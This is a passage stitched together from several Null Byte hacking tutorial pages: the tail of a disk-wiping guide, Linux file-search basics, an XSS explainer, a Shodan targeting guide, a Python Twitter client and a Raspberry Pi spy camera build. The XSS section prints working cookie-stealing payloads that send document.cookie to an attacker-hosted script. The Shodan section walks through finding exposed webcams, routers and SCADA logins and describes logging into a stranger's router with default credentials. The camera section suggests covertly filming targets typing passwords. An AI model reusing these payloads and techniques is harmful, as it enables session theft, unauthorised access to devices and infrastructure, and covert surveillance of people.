to ensure your removal is complete.We are going to use a great boot disk calledDBANto perform this operation.Step1Obtain and Burn DBANYou candownloadthe 2.2.6 Beta release from Sourceforge. Once you have the .ISO, all that's left to do is burn it to a blank CD/DVD. Place the media into your drive and restart the computer. Most computers are set to try and boot from the CD drive before the hard disk. If this is not the case, and your computer does not boot the CD drive, you will need to enter your BIOS setup and change the boot priority order.Step2Boot and Run!After the CD starts, you will be greeted with this screen:We want to simply press enter here to start DBAN in interactive mode. The main menu shown below should display your hard drive to be wiped.The next screen shows us DBAN is ready to get down to work, the default method is a DoD Short wipe, and it will work fine for us.Hit the space bar to select and it will start. Be warned though, the DoD wipe takes a bit of time, especially on larger hard drives. But not as long as a prison sentence would be.In ClosingDBAM is a great tool to clean a hard drive. I carry a copy of it in my laptop bag when I travel and you should do the same. It is quick and easy and works better then most other tools I have used. Be careful as (obviously) it is impossible to recover if you zap the wrong hard drive!Questions? Comments? Shoot me a line here, inour forums, or on ourIRC2P channel(#nullbyte).Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseImages bysnapfiles,DTIdata,FinalForensicsRelatedHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 1 (Tools & Techniques)Hack Like a Pro:Digital Forensics Using Kali, Part 2 (Acquiring a Hard Drive Image for Analysis)SPLOIT:Forensics with Metasploit ~ ( Recovering Deleted Files )How To:Become a Computer Forensics Pro with This $29 TrainingHacking Windows 10:How to Find Sensitive & 'Deleted' Files RemotelyHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 14 (Live Memory Forensics)How To:Lock Your Files & Create Password-Protected Folders in Windows 7/8How To:Install an Off-the-Shelf Hard Drive in an Xbox 360 (Get 10x the GB for Your Money)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 11 (Using Splunk)Hack Like a Pro:Digital Forensics Using Kali, Part 1 (The Tools of a Forensic Investigator)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 20 (Devices Files)How To:Revive a Dead Hard DriveHow To:Back up your data to an external hard driveHow To:Linux Basics for the Aspiring Hacker: Managing Hard DrivesHow To:Diagnose a hard drive problem and choose the right data recovery serviceHow To:Protect your data with BitLocker Drive Encryption on Windows 7How To:Completely erase a computer hard drive to remove all private dataHack Like a Pro:Digital Forensics Using Kali, Part 3 (Creating Cases in Autopsy & Sleuth Kit)Secure Your Computer, Part 3:Encrypt Your HDD/SSD to Prevent Data TheftHow To:Backup All of Your Xbox 360 Data to Your ComputerHow To:Conceal a USB Flash Drive in Everyday ItemsSecure Your Computer, Part 1:Password-Protect your BIOS Boot ScreenRemove Your Online Identity:The Ultimate Guide to Anonymity and Security on the InternetNews:Virtualization Using KVMHow To:Bypass Windows and Linux PasswordsHow To:Permanently Delete Files to Protect Privacy and PasswordsHow To:Mix a Don DraperNews:The Dance of the Hemispherical Water Droplets: Sound Waves in SpaceNews:Should Kids Be Allowed to Use Facebook and Google+?How To:Use Darik's Boot and Nuke (DBAN) to wipe a hard driveSecure Your Computer, Part 4:Use Encryption to Make a Hidden Operating SystemNews:10 Clever Uses for SugruHow To:How A Computer WorksNews:Don's Bad Ass pico DegalloHow To:Fix or Retrieve Data From A Bad Hard DriveNews:quarter prankNews:How-To-Maintain your PCHow To:Read Your Own Palm LinesNews:I Hope This Doesn't Catch On...News:Don Williamson's Real-Time Web-Based DCPU-16 Emulator & ASM Code Editor
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 4 (Finding Files) Β« Null Byte :: WonderHowTo
Welcome back, my budding hackers!I began this series on Linux basics because several of you have expressed befuddlement at working withBackTrackon Linux. As a hacker, there is no substitute for Linux skills.Linux beginners are often faced with the issue of how to find files and programs, especially considering the radically different directory structure as compared to Mac OS or Windows. Beginners sometimes get frustrated trying to find the necessary files or binaries, so I'm dedicating this tutorial to finding stuff in Linux.Before we dive in, make sure to check out my previous guides on Linux basics (1,2, and3) to get current on our lessons.Step 1: Finding Files in a Directory (Find)The first command I want to show you isfind. As you probably guessed,findis able to find stuff by looking in a directory for the file you're hunting for. By default, it's recursive, which means it will look in all sub-directories and display a list of everywhere it finds the file. For instance, if we are looking foraircrack-ng, we could type:bt > find -name aircarck-ngNote that we need to tell Linux that we want to search by name (-name) and then the name of the file we're searching for.It then returns the full path of every place where it findsaircrack-ng. We can be more specific and ask Linux to only tell us where it findsaircrack-ngin the/pentestdirectory. We can do this by typing:bt > find /pentest -name aircrack-ngThis command says, "look in the pentest directory and all its sub-directories and tell me where you find something called aircrack-ng".Now, Linux only returns those paths to files that are in the directory/pentestor its sub-directories, such as/pentest/wireless/aircrack-ngand the others.Step 2: Finding Binaries in Path Variables (Which)The next searching command we want to look at iswhich. This command allows us to search for binaries that are in our path variable. Hmm...even I think that's a lot of techo-googlygoop. Let's try to make some sense of it.Binaries are the files that are the equivalent of executables in Windows. These are files that do something likeecho,ls,cd,mv, etc. Our path variable is the variable that keeps the directory path to our binaries. Usually, our binaries are in the/bin(bin is short for binaries) or/sbindirectory and that's reflected in our path variable. Our path variable setting can be checked by asking Linux toechothe value in the variable. We do this by typing:bt > echo $PATHLinux responds with the value in our path variable. These are the places thatwhichwill search for binaries. So when we type:bt > which lsIt returns the path to that binary. If we usewhichto search foraircrack-ng:bt > which aircrack-ngThen we can see that Linux returns/usr/local/bin/aircrack-ng. Ifaircrack-ngwere not in a directory that was in our path, it would not be able to help us.Step 3: Finding Any File in Any Directory (Whereis)Unlikewhich,whereisis not limited to finding binaries in our path. It can locate files in any directory, and in addition, it also locates the files manual ormanpages. So, when we type:bt > whereis aircrack-ngWe can see thatwhereisreturns the path to multiple locations ofaircrack-ngincluding themanpages.Step 4: Finding Files Using the Database (Locate)Thelocatecommand can also be used to find files and usually is much faster than eitherwhichorwhereis. The difference is thatlocateuses a database of all the files in the file system and searches therefore take place much faster.The drawback to locate is thatnewfiles will NOT be found bylocateas the database is typically only updated daily, usually scheduled in the middle of the night when activity on the system is light as updating this database can be CPU intensive.locate aircrack-ngYou can see in the screenshot above that locate returns a path every time it encounters any file withaircrack-ngin it, binary or not.Hope this helps you in finding what you need in BackTrack Linux, therefore making you a better hacker. Make sure to check out the first three parts of this series (1,2, and3), and if you have any questions, ask away in the comments below or hit up theNull Byte forumfor more help.Come back for my next Linux basics tutorial, and we'll look at how to install new software!Penguinphotosby Liam QuinnWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 21 (GRUB Bootloader)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 5 (Installing New Software)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 12 (Loadable Kernel Modules)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 2 (Creating Directories & Files)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 13 (Mounting Drives & Devices)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 22 (Samba)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 10 (Manipulating Text)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 25 (Inetd, the Super Daemon)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 9 (Managing Environmental Variables)Hack Like a Pro:Windows CMD Remote Commands for the Aspiring Hacker, Part 1How to Hack Like a Pro:Getting Started with MetasploitHow To:Linux Basics for the Aspiring Hacker: Managing Hard DrivesHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 24 (The Linux Philosophy)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 23 (Logging)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 16 (Stdin, Stdout, & Stderror)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 3 (Managing Directories & Files)Goodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 7 - Legal HackerHack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterCommunity Byte:HackThisSite Walkthrough, Part 1 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingHow To:How Hackers Take Your Encrypted Passwords & Crack ThemCommunity Byte:HackThisSite Walkthrough, Part 2 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingNews:Let Me Introduce MyselfCommunity Byte:HackThisSite, Realistic 2 - Real Hacking Simulations
How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them) Β« Null Byte :: WonderHowTo
XSSstands for cross-site scripting, which is a form of web-based exploitation that uses client-side vulnerabilities in a web page to execute malicious JavaScript codes. JavaScript is referred to as "cross-site" because it usually involves an external website containing the malicious code. That code is most commonly used to stealcookieswith a website that the attacker created and hosted on another server. The cookies can then be used to escalate privileges and gain root access to someone's website. XSS can be used for a number of other things, such as crashing users' web browsers. As many as 68% of websites have XSS vulnerabilities.This is not good.What Makes it Happen?When a web developer isn't sanitizing user input by stripping malicious tags (i.e. <script>), the page will then pass on attack vectors to the source of the page and execute it as if it were there originally. The coder needs to sanitize malicious code tags so that the JavaScript isn't "escaping".In thisNull Byte, we will be educating you about XSS attacks and how to defend from them. There are two kinds of XSS exploitsβ€”non-persistent and persistent.Non-persistent AttacksNon-persistent attacks are very common and usually found in HTTP queries such as HTML forms and website search bars. When the attack is practiced, it would usually be sent over a trusted domain or over a private message with a link to the XSS attack. Here is an example of what a test for XSS could look like:http://www.example.com/index.php?id="><script>alert(document.cookie)</script>This would cause an alert to appear with your session cookie in the browser, but the web page executed it. What does this mean? It's vulnerable.We could then alter the attack to be directed towards a cookie logging script at our domain, and mask it in HTML and send it to fellow users:<a href="http://www.example.com/index.php?id=" rel="nofollow" target="_blank" ><script>document.location='www.yourdomain.com/cookiestealer.php?c=' + document.cookie</script>">www.google.com</a>That would appear legitimate to the person being attacked. If there was no HTML allowed, you could always mask the link with aURL shortener.Persistent AttacksPersistent attacks are probably what you assume they areβ€”persistent. The effect of persistent XSS attack will remain, not just temporarily effecting a specific user. This is because the attack vector is stored on the server, and the changes to the webpage are permanent. These are commonly executed on forums or on sites where you can customize your webpage with HTML andsavethe malicious JavaScript, rather than just execute it.The attack is performed similar to the last attack, aside from being posted in a static location. Let's take a look at how the attacks will differ:<img src="><script>document.location='www.yourdomain.com/cookiestealer.php?c=' + document.cookie'</script&gt;">Everyone who views this page will have their cookies logged to a remote cookie-logging script.How to Defend YourselfIf you're a web developer, there is only one way to prevent this. Close your tags properly and sanitize input!For the rest of us, there existsNoScript, a plugin forFirefoxthat blocks JavaScript and filters XSS attacks. It allows you to white list and selectively allow which domains have the right to use JavaScript. It is the single best plugin you can have for your browser, hands down.That's all for this Null Byte.I know this is a hard subject to wrap your head around, so if you're a beginner, keep me and the rest of the crew entertained with your questions inIRC!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Hack websites using cross-site scripting (XSS)How To:Advanced Techniques to Bypass & Defeat XSS Filters, Part 2Hack Like a Pro:How to Hack Web Apps, Part 1 (Getting Started)How To:Find XSS Vulnerable Sites with the Big List of Naughty StringsHow To:Hack a remote Internet browser with XSS ShellHow To:Advanced Techniques to Bypass & Defeat XSS Filters, Part 1How To:Cross Site Scripting (XSS) BasicsHow To:Write an XSS Cookie Stealer in JavaScript to Steal PasswordsHow To:Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrikeHow To:Hack Forum Accounts with Password-Stealing PicturesSafari 101:How to Block Cross-Site Tracking on Your iPhoneHack Like a Pro:How to Hack Web Apps, Part 6 (Using OWASP ZAP to Find Vulnerabilities)Exploiting XSS with BeEF:Part 3How To:Beginner's Guide to OWASP Juice Shop, Your Practice Hacking Grounds for the 10 Most Common Web App VulnerabilitiesHow To:Hook Web Browsers with MITMf and BeEFExploiting XSS with BeEF:Part 2Advanced Nmap:Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should KnowNews:Banks Around the World Hit with Repeated DDoS Attacks!Forbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsHow To:Is Your Website Vulnerable to XSS Injections? Here's How to Protect Your VisitorsHow To:How Hackers Steal Your Cash on Trusted Sites & How to Prevent Against ItNews:Easy Skype iPhone Exploit Exposes Your Phone Book & MoreNews:SOPA and PIPA Blackout!Exploiting XSS with BeEF:Part 1How To:Prevent Social Networks from Tracking Your Internet ActivitiesHow To:Use Firefox Add-Ons and Greasemonkey to Make Google+ PerfectHow To:XSS BonusesHow To:Start With Site Setting For Snoft Article Directory ScriptNews:12 Easy Exploits to Raise Thief Skills in SkyrimHow To:Sneak Past Web Filters and Proxy Blockers with Google TranslateNews:Poem of The Day
Metasploit Basics Β« Null Byte :: WonderHowTo
No content found.
Null Byte How-Tos Β« Null Byte :: WonderHowTo
No content found.
Hack Like a Pro: How to Find Vulnerable Targets Using Shodanβ€”The World's Most Dangerous Search Engine Β« Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers!Sometimes, we don't have a specific target in mind, but rather we are simply looking for vulnerable and easy-to-hack targets anywhere on the planet. Wouldn't be great if we had a search engine like Google that could help us find these targets? Well, we do, and it's called Shodan!What Is Shodan?Some have described Shodan as a search engine for hackers, and have even called it "the world's most dangerous search engine". It was developed byJohn Matherlyin 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers.Shodan pulls service banners (see my tutorial onfingerprinting web serversfor more on banners) from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP).What Can Shodan Show Us?Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc.Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it!Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.Now let's take a look at this fascinating and nefarious search engine!Step 1: Create a Shodan AccountFirst, let's start by navigating toshodanhq.com. When we do, we'll be greeted by an opening screen like that below.Shodan requires that you register to use all of its features, but the service is free unless you need to use some of its advanced features.Step 2: Search on ShodanOnce we have registered, we can either do custom searches or we can go to the "Search Directory" and see some of the most common and recent searches. If you are new to Shodan, I recommend that you browse "Popular Searches" first.Step 3: Find Unprotected WebcamsAmong the devices we can find on Shodan are innumerable, unprotected webcams. Here is one of many that I found on Shodan. This one is inside an airplane hangar in Norway. Notice that it has java controls to tilt and pan that you can use from the web so that you can scan and zoom-in throughout the hangar.Step 4: Find Traffic LightsThere are so many devices that can be found on Shodan that the list would fill this entire article. One of the most intriguing things we can find are traffic signals and the cameras that monitor traffic at lighted intersections (some states now use these cameras to record your license plate number and send you a ticket if they detect you speeding or running a red light).Careful here! Messing with or hacking traffic signals can cause fatalities and may be illegal. Here I show a listing of the "Red Light enforcement cameras" from Shodan.Step 5: Find RoutersShodan catalogues thousands, if not millions, of routers, many of which are unprotected. Here's a screenshot of one I found and logged into the administrator account with the username of "admin" and password of "admin".Obviously, if I had malicious intentions, I could have changed all their settings, including the password and wreaked havoc on this wireless device and its poor, unsuspecting users.Step 6: Find SCADA SystemsAmong the scariest and potentially most damaging uses of Shodan is finding SCADA (supervisory control and data acquisition) devices with web interfaces. SCADA devices are those that control such things as the electrical grid, water plants, waste treatment plants, nuclear power plants, etc.These SCADA devices are the most likely targets in a cyber-terrorism or cyber warfare scenario, where two combatants are attempting to disable the other's infrastructure. Obviously, if one combatant can disable the others electrical grid, power and water plants, etc., it won't to take long to bring their adversary to their knees.A cursory search of SCADA devices brought me to IP address of a hydroelectric plant in Genoa, Italy.When I clicked on this link, I was presented with this login screen of the hydroelectric plant's control system's interface.Obviously, the ability to login to this web-based interface could be very damaging to the hydro plant and the people and nation it serves.Step 7: Find the Default PasswordsMany of these sites and interfaces use default passwords. Fortunately for us, there are many resources on the web that list the default passwords for all devices. Here is one atwww.phenoelit.org/dpl/dpl.html. There are literally hundreds of these sites on the web. Simply Google "default passwords".As many consumers and system administrators are careless and don't change the default passwords, often you can gain access to these devices simply using these lists to find the default admin username and password.Shodan Is Your New Best FriendShodan is a different kind of search engine. Shodan pulls banners from IP addresses and then catalogues all types of devices that have a remote interface from all over the world. Many of these devices are set to accept default logins, so that once you find a device and its default login, you may be able to own it! Just keep in mind that Shodan is not an anonymous service.In addition, Shodan has some powerful features to search specifically for devices by type, login, port, and geography. I will show you some of these on my next Shodan tutorial, so keep coming back, my greenhorn hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHack Like a Pro:How to Find Any Router's Web Interface Using ShodanThe Hacks of Mr. Robot:How to Use the Shodan API with Python to Automate Scans for Vulnerable DevicesHow To:Find Vulnerable Webcams Across the Globe Using ShodanHow To:Use Dorkbot for Automated Vulnerability DiscoveryNews:Hacking SCADAHow To:Locate & Exploit Devices Vulnerable to the Libssh Security FlawNews:How to Study for the White Hat Hacker Associate Certification (CWA)How To:Change Google Chrome's Default Search Engine on Your iPhone or Android PhoneHow To:Use UFONetHack Like a Pro:How to Crack Online Passwords with Tamper Data & THC HydraHow To:Exploit EternalBlue on Windows Server with MetasploitHack Like a Pro:How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)How To:Quickly Look Up the Valid Subdomains for Any WebsiteHow To:Discover Computers Vulnerable to EternalBlue & EternalRomance Zero-DaysHack Like a Pro:How to Exploit IE8 to Get Root Access When People Visit Your WebsiteHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHow To:Hack Together a YouTube Playing Botnet Using ChromecastsHow To:Set Up an SSH Server with Tor to Hide It from Shodan & HackersFirefox Mobile 101:How to Change Your Search Engine in One TapHow To:Wardrive on an Android Phone to Map Vulnerable NetworksHugging the Web (Part 1:Introduction)News:Finding the Exploits Out in the World (For Beginner Hackers)The Anonymous Search Engine:How to Browse the Internet Without Being TrackedHow To:Search for Google+ Profiles and Posts Using Chrome's Search Engine SettingsNews:The Basics Of Website MarketingNews:Google’s Keyword ToolNews:SEO - Ugly Vs Popular - Just Like Highschool!How To:Cheat Engine for FarmVille - The Definitive GuideHow To:The Official Google+ Insider's Guide IndexHow To:Leverage Keyword Specific Pages to Boost SEO by Volusion | Two minuteNews:Introduction To Keywords & Google Keyword ToolNews:Indie and Mainstream Online Games Shut Down by LulzSec
How to Code Your Own Twitter Client in Python Using OAuth Β« Null Byte :: WonderHowTo
This is my attempt to show people some cool things we can do with programming, and to give a small incentive for people to join the weeklyCommunity Bytes. I wanted to make a tutorial on how to useTwitterfrom the command line with Python. This would have been an easy project to do not too far back, and a good bit of practice for a beginner to programming. It teaches that you can dousefulstuff with programming. However, a while ago Twitter started using something calledOAuthto access the TwitterAPI.OAuth was implemented for added security. Before, anyone could code a program to use Twitter and make it store the Twitter ID and password. Twitter thought it would be a good idea to add OAuth, which creates public keys, much likeSSH, to exchange with the Twitter API so the application is unable to access your password, mitigating the chances of a program stealing user credentials.Anyhow, let's get started.RequirementsTwitteraccountPythoninstalled on your systemStep1Download a Twitter LibraryText in bold is a terminal command for Linux. Windows users, simplydownload Tweepystraight from the repository.To make this as simple as possible, we are going to use a pre-made library that we can call functions from. For this tutorial, I am going to use the Tweepy library. Recoding a Twitter API library from scratch is beyond the scope of this tutorial.Download and Install TweepyYou need to install Tweepy from the Git repo.git clone https://github.com/tweepy/tweepyChange to the new Tweepy directory.cd tweepy/Run the setup with the Python installer.python setup.pyStep2Register Our Application with TwitterWe need to let Twitter know that we are allowing our application to have access to our Twitter account. This will also give us the keys we need.Register our new appLog in to Twitter.Gohereto register your application and fill in the appropriate data on the form.Name the application whatever you would like. Save the data.Leave the browser open with our registry data, we need to create our application now.Exchange the Unique KeysWe need to create a small script that exchanges the keys before we code the actual program. This is done separately because it only needs to be used once, therefore, it would take up space in the finished code. Here is a picture of mine without the keys:Copy the source codehere.Paste the source code in a text document, abd paste your keys in the appropriate field by copying them from your Twitter page that we left open earlier.Save it asauth.py.From a command promt or terminal, type the following command to run the script.python auth.pyFollow the URL that the program gives you when you run it and then enter your PIN into the field.Copy and paste the new keys that it give you into a text document for later use.Step3Create the Command Line ApplicationWe need to take our keys that we saved from the last part and paste them into our bit of Python code. This will ensure that Twitter knows it is an application we have authorized tweeting as us, but we don't have to risk exposing our password to the program (in case it was a 3rd party program).Paste the Keys in Our programWe need to paste all of the corresponding keys in our program. Here is a picture of how it came out:Get the source codehere.Copy and paste your corresponding keys that we saved in between the quotes.Save the document astweet.py.To use the program, execute the following code from the command line.python tweet.py"This is a tweet using Null Byte's tweet.py script."So, join in on our coding sessions to learn how to code simple, yet fun programs like this one on your own!Follow us onTwitter; come chat with us onIRC.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseImage viaunder30ceoRelatedHow To:Reverse Shell Using PythonHow To:The Novice Guide to Teaching Yourself How to Program (Learning Resources Included)How To:Use variables and strings when programming in Python 2How To:Program Your Own Little RAT (Part 2) Getting the Client WorkingHow To:Program Your Own Little RAT (Part 1) Getting the Server WorkingHow To:Hack UnrealIRCd Using Python Socket ProgrammingHow to Train Your Python:Part 1, IntroductionHow To:Enable Code Syntax Highlighting for Python in the Nano Text EditorNews:Learning Python 3.x as I go (Last Updated 6/72012)Community Byte:Coding a Web-Based Password Cracker in PythonCommunity Byte:Coding an IRC Bot in Python (For Beginners)How To:Code a Basic TCP/IP Client & Server Duo in PythonHow To:Shorten URLs from the Command Line with PythonHow To:Make a Gmail Notifier in PythonNews:The Google+ API Has Finally Launched with Read-Only Public DataPygame:All You Need to Start Making Games in PythonCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingHow To:Send SMS Messages with PythonCommunity Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 7 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingHow To:Make a Change-of-IP Notifier in PythonCommunity Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingHow To:Generate Word-Lists with Python for Dictionary AttacksCommunity Byte:HackThisSite Walkthrough, Part 5 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingWeekend Homework:How to Become a Null Byte ContributorCommunity Byte:Hack Our IRC Bot to Issue CommandsCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsHow To:Encrypt And Decrypt Text In PythonCommunity Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingGoodnight Byte:Coding a Web-Based Password Cracker in PythonNews:A Basic Website Crawler, in Python, in 12 Lines of Code.Community Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 1 - Real Hacking SimulationsUDP Flooding:How to Kick a Local User Off the NetworkWeekend Homework:How to Become a Null Byte Contributor (1/29/2012)Goodnight Byte:Coding an IRC Bot in Python (For Beginners)
How to Create a Wireless Spy Camera Using a Raspberry Pi Β« Null Byte :: WonderHowTo
Surveillance is always a useful tool in a hacker's arsenal, whether deployed offensively or defensively. Watching targets yourself isn't always practical, and traditional surveillance camera systems can be costly, lacking in capabilities, or both. Today, we will use motionEyeOS running on a Raspberry Pi Zero to create a small, concealable Wi-Fi connected spy camera that is both affordable and easily concealed.What Do I Use It For?What couldn't you use a 1 inch, sub $40 spy camera for? Really though, sophisticated surveillance has traditionally been out of reach to most people, and it's only been recently that boards like the Pi Zero W have been powerful enough to make these cool devices. Thanks to the almost plug-and-play nature of the Raspberry Pi, throwing together a customizable day or night vision camera is cheap and easy.So now that you can make one easily, there are two main ways a hacker can use a spy camera. The first is to help secure a compound from physical entry with the classicCCTVsetup. This is what the build we are making today is best configured for.Don't Miss:How to Hack CCTV Private CamerasPrior to launching an attack, the camera can also be used to perform stealthy recon to observe target behavior in an area, as well as any security measures. If put in place within the target area, it could be used to gather information, like watching targets type their passwords, taking pictures of keys, and observing how users respond to attacks.MotionEyeOSTo make this build as quick and simple as possible, we will be using a custom image for the Raspberry Pi called motionEyeOS.MotionEyeOS is a Linux distribution that turns a single-board computer into a video surveillance system. The OS is based onBuildRootand usesmotionas a backend andmotionEyefor the frontend.β€”motionEyeOSTo put it in simple terms, this will let us set up as many Raspberry Pi cameras as we want, all connected on a single pretty web interface that we can forward to the internet, and view anywhere in the world. Additionally, we will be able to set up motion detection, so that we don't have to watch hours and hours of nothing happening.Regular Camera vs NoIR CameraThere are two types of camera boards that we can use for the Pi. Both are 8 Megapixel, and shoot in 1080p. The standard camera is just like the camera you have on your smartphone, but not quite as high quality. The NoIR camera is a little different. As the name implies, it has no IR (infrared) filter. This means it can see more of the light spectrum than a standard camera, giving it the major advantage in night vision, but at the cost of appearing washed out during the day.You can see the differences more clearly in the video below, skip the first 40 seconds to get right to the action.In general, the standard camera will work great indoors when you expect the environment to be lit at the time you want to observe it. An example would be if the room always has lights on, such as a lobby.If you'll be shooting in the dark, use the NoIR camera instead so you have the power to see in the darkness. Don't forget that you'll still need an IR light source, such as thisIR LED illuminatoror thisIR LED rackin order for the camera to see. Human eyes can't see in the IR spectrum, so there is no need to worry about such a light alerting the average person to the presence of the camera.Another factor to consider is that the motion detecting for this build is software-based, so if the camera can't see, then it won't detect movement, even if there is something actually there.If you are thrifty, or can only afford one of the two types, I suggest you buy buy the NoIR camera. It is a few dollars more, but it comes with a piece of IR filter, so you can modify it to be a standard camera when you need it.Buy the cameras on Amazon:standard cameraNoIR (night vision) cameraAll the CasesThe case you use is very important for this build, and there are a lot of choices out there. Some of the things you may want to consider are:Are you using a Raspberry Pi or Pi Zero?Is the camera going to be placed outside or inside?How durable does it need to be?How conspicuous do you want it to be?Do you need an IR light source? If so do you want it in the case or somewhere else?With those questions in mind, you can search Google for the perfect case for your needs. The default choice would be ageneric camera casefrom Amazon. If you have access to a 3D printer, thenThingiverseis a good place to look for other options.(1) Or you can 3d print your own case. (2) 3d printing a case for the Pi Zero W spy camera.Images viaNull ByteIf you are using a Pi Zero, theZeroViewandPigeonare both good choices.The open source Pigeon PI Zero W case.Image viaGeraldo RamosAll the Rest You'll Need to Get StartedIf this is your first time buying a Raspberry Pi, then a Canakit kit is a generally great choice and has everything you need. The most cost-effective will always be thePi Zero CanaKitand thePi 3 CanaKit. Otherwise here is what you need for this build:Raspberry Pi: While any of the Pis would work, the real choice here is between the Pi 3 andPi Zero W. The built-in Wi-Fi makes them super easy to set up, the difference is in the performance and size. If size is more important, use the Zero but it may have performance issues such as slower frame rates. Keep in mind, you can use alonger ( 2 meters) camera ribbon cable, which would make it easier to hide the Pi, as only the camera Module itself would need to be visible.microSD cardmicroSD card readerpower supplyStep 1: Download the motionEyeOS ImageFirst, we need to download the custom Raspberry Pi image frommotionEyeOS' Github release page. Once you navigate to the website, download the latest version for the type of Pi you are using. Remember that for the Pi Zero, you need to download the original Pi version.Don't Miss:How To Hack Into & Switch On Anyone's Webcam RemotelyThe download is in archive format, so we need to extract the image from it before we can flash it. On Windows, you can use7-Zip, and on a Mac, you can useKeka. You can also useWinZipon both. 